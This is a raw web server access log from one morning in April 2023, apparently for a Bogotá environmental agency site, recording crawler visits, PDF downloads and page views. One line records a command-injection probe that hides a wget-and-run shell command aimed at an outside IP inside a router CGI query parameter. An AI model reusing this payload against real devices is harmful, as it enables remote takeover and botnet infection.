201.245.192.253 - - [21/Apr/2023:03:40:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43169
179.19.0.195 - - [21/Apr/2023:03:40:54 -0500] "GET /guadalupe-aguanoso-un-nuevo-tramo-de-camino-para-disfrutar-en-los-cerros-orientales.html HTTP/1.1" 200 795
157.55.39.207 - - [21/Apr/2023:03:42:19 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
172.22.2.4 - - [21/Apr/2023:03:40:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
37.115.253.133 - - [21/Apr/2023:03:42:33 -0500] "GET /cgi-bin/luci?language=$(wget%20http://163.123.143.126/tenda.sh;sh%20 netlog.sh) HTTP/1.1 HTTP/1.1" 404 1165
201.245.192.253 - - [21/Apr/2023:03:42:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
216.245.221.92 - - [21/Apr/2023:03:42:44 -0500] "HEAD / HTTP/1.1" 200 -
124.187.242.62 - - [21/Apr/2023:03:43:01 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [21/Apr/2023:03:41:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56287
34.91.35.60 - - [21/Apr/2023:03:44:28 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [21/Apr/2023:03:45:11 -0500] "GET /BLA/boletinlegal/Directivas/2018/Directiva%20No.%2025%20del%2027%20de%20diciembre%20de%202018.pdf HTTP/1.1" 200 1351319
172.22.2.4 - - [21/Apr/2023:03:46:36 -0500] "GET /BLA/boletinlegal/Directivas/2014/Directiva%20No.%203%20del%2020%20de%20Mayo%20de%202014.pdf HTTP/1.1" 200 504420
201.245.192.253 - - [21/Apr/2023:03:47:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
216.245.221.92 - - [21/Apr/2023:03:47:44 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Apr/2023:03:48:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109509
172.22.2.4 - - [21/Apr/2023:03:46:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [21/Apr/2023:03:47:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57561
201.245.192.253 - - [21/Apr/2023:03:52:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
52.167.144.27 - - [21/Apr/2023:03:52:41 -0500] "GET /BLA/boletinlegal/notificaciones.php HTTP/1.1" 200 10015
216.245.221.92 - - [21/Apr/2023:03:52:44 -0500] "HEAD / HTTP/1.1" 200 -
173.252.83.5 - - [21/Apr/2023:03:53:39 -0500] "GET /images/incautan-animales-semana-santa-2023.jpeg HTTP/1.1" 200 36611
172.22.2.4 - - [21/Apr/2023:03:52:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [21/Apr/2023:03:53:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52730
157.55.39.220 - - [21/Apr/2023:03:56:55 -0500] "GET /BLA/resoluciones/AUTOS%202013/2217.pdf HTTP/1.1" 200 561215
201.245.192.253 - - [21/Apr/2023:03:57:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
216.245.221.92 - - [21/Apr/2023:03:57:44 -0500] "HEAD / HTTP/1.1" 200 -
190.24.142.241 - - [21/Apr/2023:03:57:58 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
52.167.144.27 - - [21/Apr/2023:03:58:02 -0500] "GET /bla/resoluciones/autos%202022/2958.pdf HTTP/1.1" 200 512733
172.22.2.4 - - [21/Apr/2023:03:58:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [21/Apr/2023:04:00:01 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%207%20del%2023%20de%20Diciembre%20de%202011.pdf HTTP/1.1" 304 -
172.22.2.4 - - [21/Apr/2023:03:59:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58663
168.119.253.11 - - [21/Apr/2023:04:01:36 -0500] "GET / HTTP/1.1" 200 319
168.119.253.11 - - [21/Apr/2023:04:01:37 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [21/Apr/2023:04:02:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
216.245.221.92 - - [21/Apr/2023:04:02:44 -0500] "HEAD / HTTP/1.1" 200 -
168.119.100.88 - - [21/Apr/2023:04:04:30 -0500] "GET / HTTP/1.1" 200 319
168.119.100.88 - - [21/Apr/2023:04:04:31 -0500] "GET / HTTP/1.1" 200 4720
168.119.253.48 - - [21/Apr/2023:04:04:41 -0500] "GET / HTTP/1.1" 200 4720
168.119.253.48 - - [21/Apr/2023:04:04:42 -0500] "GET / HTTP/1.1" 200 319
181.59.3.227 - - [21/Apr/2023:04:05:01 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
179.51.119.133 - - [21/Apr/2023:04:05:16 -0500] "GET /guadalupe-aguanoso-un-nuevo-tramo-de-camino-para-disfrutar-en-los-cerros-orientales.html HTTP/1.1" 304 -
172.22.2.4 - - [21/Apr/2023:04:04:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [21/Apr/2023:04:04:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
69.63.184.118 - - [21/Apr/2023:04:07:12 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 206 823
179.51.109.117 - - [21/Apr/2023:04:07:12 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html?fbclid=IwAR0NCW7RBZa5H3Ukd0KATmxUM2f1fDikL-Aw6UA7rxPuaDWeiM6Rd0WT_qk HTTP/1.1" 200 823
69.63.184.116 - - [21/Apr/2023:04:07:12 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 206 823
201.245.192.253 - - [21/Apr/2023:04:07:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
216.245.221.92 - - [21/Apr/2023:04:07:44 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.63 - - [21/Apr/2023:04:09:38 -0500] "GET /bla/resoluciones/resoluciones%202013/1705.pdf HTTP/1.1" 200 4738970
40.77.167.84 - - [21/Apr/2023:04:11:13 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [21/Apr/2023:04:09:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [21/Apr/2023:04:12:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
172.22.2.4 - - [21/Apr/2023:04:10:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52326
216.245.221.92 - - [21/Apr/2023:04:12:44 -0500] "HEAD / HTTP/1.1" 200 -
139.177.246.49 - - [21/Apr/2023:04:13:25 -0500] "GET /portaldeninos/wp-content/uploads/2021/11/aves-fauna-16-junio.jpg HTTP/1.1" 200 19490
66.249.69.33 - - [21/Apr/2023:04:14:37 -0500] "-" 408 -
114.119.132.146 - - [21/Apr/2023:04:16:19 -0500] "-" 408 -
201.245.192.253 - - [21/Apr/2023:04:17:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
172.22.2.4 - - [21/Apr/2023:04:15:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [21/Apr/2023:04:17:38 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
216.245.221.92 - - [21/Apr/2023:04:17:44 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Apr/2023:04:16:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
172.22.2.4 - - [21/Apr/2023:04:18:20 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [21/Apr/2023:04:18:44 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [21/Apr/2023:04:18:44 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [21/Apr/2023:04:18:44 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [21/Apr/2023:04:18:44 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [21/Apr/2023:04:18:44 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [21/Apr/2023:04:18:44 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [21/Apr/2023:04:18:44 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [21/Apr/2023:04:18:44 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [21/Apr/2023:04:18:45 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [21/Apr/2023:04:18:45 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [21/Apr/2023:04:18:45 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [21/Apr/2023:04:18:45 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [21/Apr/2023:04:18:45 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [21/Apr/2023:04:18:45 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [21/Apr/2023:04:18:45 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [21/Apr/2023:04:18:45 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [21/Apr/2023:04:18:45 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [21/Apr/2023:04:18:46 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [21/Apr/2023:04:18:46 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [21/Apr/2023:04:18:51 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
172.22.2.4 - - [21/Apr/2023:04:18:51 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
172.22.2.4 - - [21/Apr/2023:04:18:51 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
172.22.2.4 - - [21/Apr/2023:04:18:52 -0500] "GET /BLA/boletinlegal/images/arr_r.jpg HTTP/1.1" 200 1998
172.22.2.4 - - [21/Apr/2023:04:18:59 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [21/Apr/2023:04:18:59 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [21/Apr/2023:04:19:01 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [21/Apr/2023:04:19:45 -0500] "GET /BLA/boletinlegal/images/background.gif HTTP/1.1" 200 -
201.245.192.253 - - [21/Apr/2023:04:20:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38482
201.245.192.253 - - [21/Apr/2023:04:20:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43182
172.22.2.4 - - [21/Apr/2023:04:18:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55571
172.22.2.4 - - [21/Apr/2023:04:20:24 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1308
172.22.2.4 - - [21/Apr/2023:04:19:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55571
179.51.119.52 - - [21/Apr/2023:04:20:58 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
191.95.63.7 - - [21/Apr/2023:04:22:08 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
201.245.192.253 - - [21/Apr/2023:04:22:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
216.245.221.92 - - [21/Apr/2023:04:22:44 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Apr/2023:04:21:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [21/Apr/2023:04:23:36 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%207%20del%201%20de%20Agosto%20de%202013.pdf HTTP/1.1" 200 340934
172.22.2.4 - - [21/Apr/2023:04:22:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56754
172.22.2.4 - - [21/Apr/2023:04:25:22 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [21/Apr/2023:04:25:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61759
201.245.192.253 - - [21/Apr/2023:04:27:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
216.245.221.92 - - [21/Apr/2023:04:27:44 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Apr/2023:04:28:11 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
66.249.69.63 - - [21/Apr/2023:04:28:14 -0500] "-" 408 -
157.55.39.207 - - [21/Apr/2023:04:28:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/5339.pdf HTTP/1.1" 304 -
172.22.2.4 - - [21/Apr/2023:04:27:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [21/Apr/2023:04:28:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53114
201.245.192.253 - - [21/Apr/2023:04:30:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38482
201.245.192.253 - - [21/Apr/2023:04:30:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43182
201.245.192.253 - - [21/Apr/2023:04:32:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
216.245.221.92 - - [21/Apr/2023:04:32:44 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.240 - - [21/Apr/2023:04:33:10 -0500] "GET /soratama-en-los-cerros-orientales-un-rincon-ideal-para-los-mamiferos.html HTTP/1.1" 200 804
172.22.2.4 - - [21/Apr/2023:04:33:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.155.74.39 - - [21/Apr/2023:04:35:31 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
172.22.2.4 - - [21/Apr/2023:04:34:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53924
66.249.69.63 - - [21/Apr/2023:04:36:41 -0500] "-" 408 -
172.22.2.4 - - [21/Apr/2023:04:36:45 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [21/Apr/2023:04:36:45 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1038
201.245.192.253 - - [21/Apr/2023:04:37:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
216.245.221.92 - - [21/Apr/2023:04:37:44 -0500] "HEAD / HTTP/1.1" 200 -
34.91.35.60 - - [21/Apr/2023:04:38:56 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
40.77.167.94 - - [21/Apr/2023:04:39:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5262.pdf HTTP/1.1" 304 -
201.245.192.253 - - [21/Apr/2023:04:40:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38482
201.245.192.253 - - [21/Apr/2023:04:40:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43182
173.252.79.16 - - [21/Apr/2023:04:40:20 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
172.22.2.4 - - [21/Apr/2023:04:40:23 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2001%20del%2017%20de%20Enero%20de%202017.pdf HTTP/1.1" 304 -
172.22.2.4 - - [21/Apr/2023:04:39:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [21/Apr/2023:04:39:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
201.245.192.253 - - [21/Apr/2023:04:42:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
216.245.221.92 - - [21/Apr/2023:04:42:44 -0500] "HEAD / HTTP/1.1" 200 -
66.249.70.172 - - [21/Apr/2023:04:43:40 -0500] "-" 408 -
66.249.69.63 - - [21/Apr/2023:04:44:08 -0500] "-" 408 -
181.59.2.23 - - [21/Apr/2023:04:45:35 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
186.29.183.187 - - [21/Apr/2023:04:45:42 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
172.22.2.4 - - [21/Apr/2023:04:44:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
45.238.183.150 - - [21/Apr/2023:04:46:44 -0500] "GET /guadalupe-aguanoso-un-nuevo-tramo-de-camino-para-disfrutar-en-los-cerros-orientales.html HTTP/1.1" 200 795
172.22.2.4 - - [21/Apr/2023:04:45:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52730
201.245.192.253 - - [21/Apr/2023:04:47:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 14501
216.245.221.92 - - [21/Apr/2023:04:47:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Apr/2023:04:48:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
172.22.2.4 - - [21/Apr/2023:04:47:29 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 52326
201.245.192.253 - - [21/Apr/2023:04:49:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
66.249.69.63 - - [21/Apr/2023:04:49:46 -0500] "-" 408 -
172.22.2.4 - - [21/Apr/2023:04:48:13 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 52326
172.22.2.4 - - [21/Apr/2023:04:52:17 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [21/Apr/2023:04:50:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [21/Apr/2023:04:52:43 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Apr/2023:04:51:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56754
201.245.192.253 - - [21/Apr/2023:04:54:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
186.154.179.203 - - [21/Apr/2023:04:55:50 -0500] "GET /mujeres-que-reverdec HTTP/1.1" 404 1136
186.154.179.203 - - [21/Apr/2023:04:55:52 -0500] "GET /favicon.ico HTTP/1.1" 404 1334
199.16.157.183 - - [21/Apr/2023:04:56:00 -0500] "GET /images/Incendio%20(1)%20(1).png HTTP/1.1" 200 189748
199.16.157.181 - - [21/Apr/2023:04:56:00 -0500] "GET /secretaria-de-ambiente-hace-seguimiento-a-la-calidad-del-aire-producto-de-incendio-a-las-afueras-de-bogota.html HTTP/1.1" 200 922
66.249.69.63 - - [21/Apr/2023:04:56:17 -0500] "-" 408 -
216.245.221.92 - - [21/Apr/2023:04:57:43 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Apr/2023:04:56:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
64.62.197.27 - - [21/Apr/2023:04:58:41 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [21/Apr/2023:04:57:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
201.245.192.253 - - [21/Apr/2023:04:59:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
64.62.197.23 - - [21/Apr/2023:04:59:45 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
64.62.197.28 - - [21/Apr/2023:05:00:13 -0500] "GET /geoserver/web/ HTTP/1.1" 200 2424
66.249.70.168 - - [21/Apr/2023:05:00:43 -0500] "-" 408 -
170.78.40.171 - - [21/Apr/2023:05:01:09 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
170.78.40.171 - - [21/Apr/2023:05:01:09 -0500] "GET /images/mujeres-que-reverdecen.jpg HTTP/1.1" 200 31358
170.78.42.98 - - [21/Apr/2023:05:02:06 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
66.249.69.63 - - [21/Apr/2023:05:02:07 -0500] "-" 408 -
172.22.2.4 - - [21/Apr/2023:05:02:34 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
216.245.221.92 - - [21/Apr/2023:05:02:43 -0500] "HEAD / HTTP/1.1" 200 -
162.55.41.96 - - [21/Apr/2023:05:03:02 -0500] "GET / HTTP/1.1" 200 4720
162.55.41.96 - - [21/Apr/2023:05:03:04 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [21/Apr/2023:05:02:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [21/Apr/2023:05:04:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
40.77.167.245 - - [21/Apr/2023:05:04:19 -0500] "GET /portaldeninos/humedal-la-conejera-2/ HTTP/1.1" 200 88020
85.0.226.80 - - [21/Apr/2023:05:04:26 -0500] "GET /BLA/resoluciones/AUTOS%202008/0761.pdf HTTP/1.1" 200 137519
172.22.2.4 - - [21/Apr/2023:05:03:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
35.234.169.74 - - [21/Apr/2023:05:05:32 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
201.221.172.153 - - [21/Apr/2023:05:05:36 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
186.29.31.86 - - [21/Apr/2023:05:05:42 -0500] "GET /guadalupe-aguanoso-un-nuevo-tramo-de-camino-para-disfrutar-en-los-cerros-orientales.html HTTP/1.1" 200 795
186.102.26.105 - - [21/Apr/2023:05:07:05 -0500] "-" 408 -
186.102.26.105 - - [21/Apr/2023:05:07:05 -0500] "-" 408 -
52.167.144.27 - - [21/Apr/2023:05:07:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0522.pdf HTTP/1.1" 304 -
45.238.181.194 - - [21/Apr/2023:05:07:23 -0500] "GET /guadalupe-aguanoso-un-nuevo-tramo-de-camino-para-disfrutar-en-los-cerros-orientales.html HTTP/1.1" 200 795
216.245.221.92 - - [21/Apr/2023:05:07:43 -0500] "HEAD / HTTP/1.1" 200 -
66.249.69.63 - - [21/Apr/2023:05:08:04 -0500] "-" 408 -
201.245.192.253 - - [21/Apr/2023:05:09:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
172.22.2.4 - - [21/Apr/2023:05:08:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [21/Apr/2023:05:09:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50283
172.22.2.4 - - [21/Apr/2023:05:10:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57561
17.246.15.225 - - [21/Apr/2023:05:12:23 -0500] "-" 408 -
216.245.221.92 - - [21/Apr/2023:05:12:43 -0500] "HEAD / HTTP/1.1" 200 -
34.91.254.233 - - [21/Apr/2023:05:13:14 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
52.167.144.63 - - [21/Apr/2023:05:13:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/6643.pdf HTTP/1.1" 304 -
181.61.205.28 - - [21/Apr/2023:05:14:05 -0500] "GET /mujeres-que-reverdec HTTP/1.1" 404 1136
181.61.205.28 - - [21/Apr/2023:05:14:05 -0500] "GET /favicon.ico HTTP/1.1" 404 1334
201.245.192.253 - - [21/Apr/2023:05:14:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
66.249.69.63 - - [21/Apr/2023:05:14:25 -0500] "-" 408 -
181.61.205.28 - - [21/Apr/2023:05:14:32 -0500] "GET /mujeres-que-reverdec HTTP/1.1" 404 1136
181.61.205.28 - - [21/Apr/2023:05:14:37 -0500] "GET /mujeres-que-reverdec HTTP/1.1" 404 1136
181.61.205.28 - - [21/Apr/2023:05:14:59 -0500] "GET / HTTP/1.1" 200 4720
181.61.205.28 - - [21/Apr/2023:05:14:59 -0500] "GET /js/url.js HTTP/1.1" 404 1294
181.61.205.28 - - [21/Apr/2023:05:14:59 -0500] "GET /css/bootstrap.min.css HTTP/1.1" 200 178212
181.61.205.28 - - [21/Apr/2023:05:14:59 -0500] "GET /fonts/icomoon/style.css HTTP/1.1" 200 79820
181.61.205.28 - - [21/Apr/2023:05:14:59 -0500] "GET /css/style.css HTTP/1.1" 200 3473
172.22.2.4 - - [21/Apr/2023:05:14:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [21/Apr/2023:05:14:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58307
216.245.221.92 - - [21/Apr/2023:05:17:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Apr/2023:05:19:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
157.55.39.220 - - [21/Apr/2023:05:20:00 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
201.245.192.253 - - [21/Apr/2023:05:20:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38756
201.245.192.253 - - [21/Apr/2023:05:20:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43175
52.167.144.63 - - [21/Apr/2023:05:20:31 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
172.22.2.4 - - [21/Apr/2023:05:19:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [21/Apr/2023:05:20:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58307
216.245.221.92 - - [21/Apr/2023:05:22:43 -0500] "HEAD / HTTP/1.1" 200 -
66.249.69.63 - - [21/Apr/2023:05:24:02 -0500] "-" 408 -
201.245.192.253 - - [21/Apr/2023:05:24:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
173.252.95.6 - - [21/Apr/2023:05:24:30 -0500] "GET /images/negocios-verdes-mayo-2022.jpg HTTP/1.1" 200 48000
172.22.2.4 - - [21/Apr/2023:05:25:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
179.19.111.253 - - [21/Apr/2023:05:27:42 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
216.245.221.92 - - [21/Apr/2023:05:27:43 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Apr/2023:05:28:11 -0500] "HEAD /BLA/boletinlegal/actos.php HTTP/1.1" 200 -
172.22.2.4 - - [21/Apr/2023:05:26:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
121.91.80.104 - - [21/Apr/2023:05:28:18 -0500] "HEAD /cooperacion-internacional-postulate-para-la-coordinacion-ambiental-de-proyecto-con-la-union-europea-avantia.html HTTP/1.1" 200 -
